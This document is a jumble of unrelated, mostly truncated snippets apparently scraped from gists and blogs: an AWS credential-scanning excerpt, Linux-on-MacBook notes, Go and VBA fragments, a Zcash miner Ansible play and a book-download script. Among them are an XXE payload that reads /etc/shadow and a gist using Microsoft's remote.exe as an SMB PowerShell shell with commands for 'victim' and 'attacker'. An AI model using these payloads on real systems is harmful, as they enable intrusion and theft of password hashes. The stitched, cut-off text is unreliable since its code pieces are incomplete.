kost kost

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/
Finding hard-coded credentials in your code
Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated. Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret. We suggest running the following regular expressions against your code base:
Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]). In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after.
Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]). In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after.
If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands
@roadrunner2
roadrunner2 / 0 Linux-On-MBP-Late-2016.md
Last active February 29, 2024 16:29
Linux on MacBook Pro Late 2016 and Mid 2017 (with Touchbar)

Introduction

This is about documenting getting Linux running on the late 2016 and mid 2017 MBPs; the focus is mostly on the MacBookPro13,3 and MacBookPro14,3 (15-inch models), but I try to make it relevant and provide information for MacBookPro13,1, MacBookPro13,2, MacBookPro14,1, and MacBookPro14,2 (13-inch models) too. I'm currently using Fedora 27, but most of the things should be valid for other recent distros even if the details differ. The kernel version is 4.14.x (after latest update).

The state of Linux on the MBP (with particular focus on MacBookPro13,2) is also being tracked on https://github.com/Dunedan/mbp-2016-linux . And for Ubuntu users there are a couple of tutorials (here and here) focused on that distro and the MacBook.

Note: For those who have followed these instructions earlier, and in particular for those who have had problems with the custom DSDT, modifying the DSDT is not necessary anymore - se

/**
* Broadlink Switch
*
* Copyright 2016 BeckyR
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
package main
import (
"flag"
"fmt"
"io"
"log"
"net"
"os"
)
@kfatehi
kfatehi / hb_all_books_dl.js
Last active March 7, 2021 08:07 — forked from graymouser/hb_all_books_dl.js
Humble bundle book bundles - download all books at once
/*
After purchasing a humble book bundle, go to your download page for that bundle.
Open a console window for the page and paste in the below javascript
this fork downloads all formats and does so without using jquery (since that didnt work for me)
note that if you are in chrome, chrome will not download the pdfs for you by default, to fix this
type “about:plugins” in the address bar and disable chrome's pdf viewer
*/
var pattern = /(MOBI|EPUB|PDF)$/i;
@mattifestation
mattifestation / gist:8ef36782ceb7f73d74cfb00c2a710301
Created November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@marshyon
marshyon / main.go
Created November 11, 2016 14:30
golang concurrent http client with worker and generator 'load balance' mechanism and pool of workers
package main
import (
"fmt"
"io/ioutil"
"net/http"
)
func getPage(url string) (int, error) {
resp, err := http.Get(url)
@ricksancho
ricksancho / miner_zcash.yml
Last active May 5, 2020 18:01
Zcash ansible script
---
- hosts: [miner_zcash, tag_Name_zmine, zmine*]
become_method: sudo
become_user: root
become: true
strategy: free
vars:
stratum_uri: zec-eu.suprnova.cc:2142
stratum_user: rick3_.user
stratum_password: password
@topahl
topahl / CVSSv2.bas
Last active January 30, 2022 11:13
Excel CVSS Score calculation function
Attribute VB_Name = "CVSSv2"
Function CVSSv2(AV As String, AC As String, AU As String, C As String, I As String, A As String)
Attribute CVSSv3.VB_Description = "This function calculates the CVSSv3 Score from the coresponding vector"
Attribute CVSSv3.VB_ProcData.VB_Invoke_Func = " \n9"
Dim intAV, intAC, intAU, intC, intI, intA As Double
Dim ImpactScore, ISCbase, Exploitability As Double
Select Case AV
Case "Network", "N"
intAV = 1